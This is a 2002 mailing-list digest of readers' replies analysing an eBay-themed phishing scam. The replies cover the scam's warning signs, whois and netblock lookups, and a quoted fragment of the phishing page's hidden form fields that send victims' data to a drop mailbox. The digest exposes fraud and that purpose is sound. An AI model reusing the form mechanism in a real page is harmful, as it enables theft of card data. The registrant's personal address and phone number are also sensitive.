FC: Replies to scam stealing credit card numbers from eBay members

[Declan McCullagh <declan () well com>]

Previous Politech message:

"Scam extracts credit card numbers, bank info from eBay members"
http://www.politechbot.com/p-03476.html

---

Date: Thu, 02 May 2002 08:25:45 -0500
To: declan () well com
From: "Randal J. King" <rjking () vtechnology com>
Subject: Re: FC: Scam extracts credit card numbers, bank info from eBay
  members

Declan -

Quick action on someone's part - the domain is down.  I had a similar thing 
last week for PayPal.  The tip off often is, as it is in your case, poor 
grammar and overall sentence/paragraph construction.  These scum spend a 
lot of time duplicating the look of a legitimate site to trap people.

-- Randy

---

From: "D McOwen" <dmcowen () bellsouth net>
To: <declan () well com>
Subject: RE: Scam extracts credit card numbers, bank info from eBay members
Date: Thu, 2 May 2002 09:39:40 -0400

Declan,

I've been getting the same sort of E-mails in the last two weeks with
various big name headers such as Yahoo, Amazon, MSN, AOL, Earthlink etc all
trying to do the same thing. If you put your info in their website including
credit card numbers, you give them the store.

Scammers and spammers have been really cranking it up a notch lately. I
suspect out of work programmers from the dot com crash have been recruited
for illegal purposes unfortunately.

Dave McOwen

---

From: "Anthony Healy" <thealy () magna com au>
To: <declan () well com>
Subject: RE: Scam extracts credit card numbers, bank info from eBay members
Date: Fri, 3 May 2002 01:04:11 +1000

And reason 6: Clumsy phraseology and innaccurate grammar. ( How come
scammers are never good with grammer?)

> To avoid any inconvenience concerning an
> interruption of your service membership, in future.
> ...Remember to "doublecheck" all the fields for

Regards, Tony Healy

---

Date: Thu, 2 May 2002 19:34:01 -0700
To: declan () well com
From: Stanton McCandlish <mech () eff org>
Subject: Re: FC: Scam extracts credit card numbers, bank info from
 eBay members

At 9:57 AM -0400 on 5/2/02, Declan McCullagh wrote:

> Obvious reasons this is a scam:
> 1. Headers show it originated from sdn-ar-001nynyorp256.dialsprint.net
> 2. The destination URL is http://64.177.3.234/, which receives connectivity
>    from qwest.net, not ebay.com.
> 3. There's no reason for eBay to send this message to me
> 4. The site is not using a secure connection (https://) URLs for
>    to protect sensitive information, which eBay almost certainly would.
> 5. Replies are directed to to a yahoo.com address

6. A load of addresses in the To header, instead of Bcc'd or sent
individually, yet there are not nearly ENOUGH of them for this to
really be an eBay message. There are millions of eBay users, so even
between debiejean () aol com and debjames () austin rr com would be many,
many other addresses.
7. Really bad grammar, e.g.: "incorrect and/or (fraudulent)" and "To
avoid any inconvenience concerning an interruption of your service
membership, in future. Please take..."

--
Stanton McCandlish      mech () eff org       http://www.eff.org/~mech
Technical Director/Webmaster         Electronic Frontier Foundation
voice: +1 415 436 9333 x105                    fax: +1 415 436 9993
EFF, 454 Shotwell St.                    San Francisco CA 94110 USA

---

From: "Allen Smith" <easmith () beatrice rutgers edu>
Message-Id: <10205020900.ZM30484 () beatrice rutgers edu>
Date: Thu, 2 May 2002 09:00:20 -0400
To: Declan McCullagh <declan () well com>
Subject: Re: FC: Scam extracts credit card numbers, bank info from eBay members
Mime-Version: 1.0

On May 2,  8:40am, Declan McCullagh wrote:
> Obvious reasons this is a scam:
> 1. Headers show it originated from sdn-ar-001nynyorp256.dialsprint.net
> 2. The destination URL is http://64.177.3.234/, which receives connectivity
>    from qwest.net, not ebay.com.
> 3. There's no reason for eBay to send this message to me
> 4. The site is not using a secure connection (https://) URLs for
>    to protect sensitive information, which eBay almost certainly would.
> 5. Replies are directed to to a yahoo.com address

While I believe you're correct on most of this:
        A. eBay is not that great on security:
                                http://news.com.com/2100-1017-870959.html
                http://spoor12.edup.tudelft.nl/SkyLined/docs/cross_site_scripting.archive.html
           so it would not be _that_ surprising to see them not using proper
           encryption.
        B. There's one thing you aren't mentioning, namely that email from
           ebay is unlikely to be coming from an email address they're
           shutting down in favor of a web form, namely
           "SafeHarbor () ebay com".

        -Allen

P.S. See http://news.com.com/2100-1017-857177.html for one past report on
this scam.

--
Allen Smith                     http://cesario.rutgers.edu/easmith/
September 11, 2001              A Day That Shall Live In Infamy II
"They that can give up essential liberty to obtain a little temporary
safety deserve neither liberty nor safety." - Benjamin Franklin

---

Date: Thu, 02 May 2002 09:09:05 -0400
To: declan () well com
From: Brian McWilliams <brian () pc-radio com>
Subject: Re: FC: Scam extracts credit card numbers, bank info from eBay
  members

Declan,

That IP resolves to NOREAGAX02.COM . Was just registered yesterday and is 
using an EarthLink drop-box ( bkclan666 () earthlink net ) according to the 
HTML. Responsible parties have been notified.

This type of scam is getting old:

http://www.newsbytes.com/news/02/173962.html

Brian

+++

Olive Johnson
   3650 CARLTON ST
   BARNUM, Minnesota 55707
   US

   Domain Name: NOREAGAX02.COM

   Administrative Contact:
         Olive Johnson    noreaga01 () earthlink net
        Olive Johnson
        3650 CARLTON ST
        BARNUM, Minnesota 55707
        US
        Phone: 2183890280
        Fax: 555-555-5555
   Technical Contact:
        Apollo Hosting  registration () apollohosting com
        Apollo Hosting, Inc
        11712 Jefferson Ave. Suite 423
        Newport  News, Virginia 23606
        US
        Phone: 7578988666
        Fax: 8008610986

   Record updated on 2002-05-01 10:50:08.
   Record created on 2002-05-01.
   Record expires on 2003-05-01.
   Database last updated on 2002-05-02 08:58:17 EST.

   Domain servers in listed order:

   NS.APOLLOHOSTING.COM          216.147.43.193
   NS2.APOLLOHOSTING.COM         216.147.1.144

---

Subject: Re: FC: Scam extracts credit card numbers, bank info from eBay
        members
From: Steve Withers <swithers () mmp org nz>
To: declan () well com
Date: 03 May 2002 01:15:28 +1200

This looks like the guilty party:

input type="HIDDEN" name="redirect" action="refresh" delay =" 0.3"
value="http://64.177.3.234/redirect.html";

input type=HIDDEN name="recipient" value="bkclan666 () earthlink net"

Steve

---

From: "FourMat Technologies, Inc" <matt () fourmat-engineering com>
To: <declan () well com>
References: <20020502095719.A29274 () cluebot com>
Subject: Re: Scam extracts credit card numbers, bank info from eBay members
Date: Thu, 2 May 2002 09:15:28 -0400
Organization: FourMat Technologies, Inc

Another confirmation that it's a scam is the script that it uses to collect
information inside the code of the page, formmail.pl.  This is classically
just an information collecting script that emails the form fields to the
recipient, using the sendmail protocol.  Very simple and a total security
concern.  The recipient of the mail is bkclan666 () earthlink net  if that says
anything.

Hmm, interesting, go to the page and try to right click. It moves the
browser window around and beeps at you a lot.  Annoying.  I wonder if eBay
uses these tactics on their pages.   I would bet not.

This would probably be of interest to the guys over at slashdot.

Matt Hartman
FourMat Technologies, Inc
matt () fourmat-engineering com

---

Date: Thu, 02 May 2002 09:41:12 -0400
To: declan () well com
From: [someone who seemed to want to remain anonymous]
Subject: Re: FC: Scam extracts credit card numbers, bank info from eBay
  members

64.177.3.234 is a web server owned/operated by "noreagax02.com" running 
Apache 1.3.20 unix Apache JServ/1.1.2 PHP/4.1.2 FrontPage5.0.2.2510 Rewrit 
1.1a on the Alabanza netblock.
Here are the details of Alabanza:
Alabanza, Inc. (NETBLK-ALABANZA-BALT-4)
   8309 Tinsley Rd.
   Baltimore, MD 21244
   US

   Netname: ALABANZA-BALT-4
   Netblock: 64.176.0.0 - 64.177.255.255
   Maintainer: ALAB

   Coordinator:
      Cunningham, Thomas  (TC12-ARIN)  ipadmin () alabanza com
      410-779-1400

   Domain System inverse mapping provided by:

   NS.ALABANZA.COM              209.239.47.252
   NS2.ALABANZA.COM             209.239.47.201

   ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE

   Record last updated on 06-Oct-2000.
   Database last updated on  1-May-2002 19:59:42 EDT.


On the side....netsol cannot resolve noreagax02.com...?!

Hope this gets you on track :)

regards




-------------------------------------------------------------------------
POLITECH -- Declan McCullagh's politics and technology mailing list
You may redistribute this message freely if you include this notice.
To subscribe to Politech: http://www.politechbot.com/info/subscribe.html
This message is archived at http://www.politechbot.com/
Declan McCullagh's photographs are at http://www.mccullagh.org/
-------------------------------------------------------------------------
Sign this pro-therapeutic cloning petition: http://www.franklinsociety.org
-------------------------------------------------------------------------